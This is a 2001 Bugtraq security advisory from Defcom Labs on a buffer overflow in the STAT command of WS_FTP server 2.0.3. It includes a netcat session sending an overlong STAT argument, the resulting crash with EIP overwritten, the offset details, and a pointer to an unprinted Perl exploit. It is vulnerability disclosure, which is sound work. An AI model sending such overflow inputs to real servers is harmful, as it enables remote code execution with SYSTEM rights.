From andreas.junestam@defcom.com Mon Nov 5 11:10:57 2001 From: andreas junestam To: bugtraq Date: Mon, 05 Nov 2001 10:09:00 +0100 Subject: def-2001-31 ====================================================================== Defcom Labs Advisory def-2001-31 WS_FTP server 2.0.3 Buffer Overflow Author: Andreas Junestam Co-Author: Janne Sarendal Release Date: 2001-10-05 ====================================================================== ------------------------=[Brief Description]=------------------------- WS_FTP server 2.0.3 contains a buffer overflow which affects the STAT command. This buffer overflow gives an attacker the ability to run code on the target with SYSTEM RIGHTS, due to the fact that the server runs as a service by default. ------------------------=[Affected Systems]=-------------------------- - WS_FTP server 2.0.3 and possibly earlier versions ----------------------=[Detailed Description]=------------------------ * Command Buffer Overrun The parsing code for the STAT command suffers from a buffer overflow. By sending a STAT command followed by an argument greater than 479 (475 bytes + new return address) bytes, a buffer will overflow and the EIP will be overwritten. The overflow is dependant on the size of the name of the server because the argument, the servername and some more information is wsprint'ed together in the buffer. A proof-of-concept exploit is attached to the advisory. C:\tools\web>nc localhost 21 220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717) 220-Wed Aug 08 19:57:40 2001 220-30 days remaining on evaluation. 220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717) user ftp 331 Password required pass ftp 230 user logged in stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA 0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21 SetFolder = C:\program\iFtpSvc\helig SetFolder = C:\program\iFtpSvc\helig\public SetFolder = C:/program/iFtpSvc/helig 0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success (A1) Access violation - code c0000005 (first chance) eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002 esi=0067c280 edi=00130178 eip=41414141 esp=0104ded4 ebp=41414141 iopl=0 41414141 ?? ??? ---------------------------=[Workaround]=----------------------------- Download new version(2.0.4) from: http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html -----------------------------=[Exploit]=------------------------------ See attached file, ws_ftp2.pl -------------------------=[Vendor Response]=-------------------------- This issue was brought to the vendors attention on the 8th of August, 2001. Patch is released. ====================================================================== This release was brought to you by Defcom Labs labs@defcom.com http://labs.defcom.com ====================================================================== [Part 2, Application/X-PERL 3.3KB] [Unable to print this part]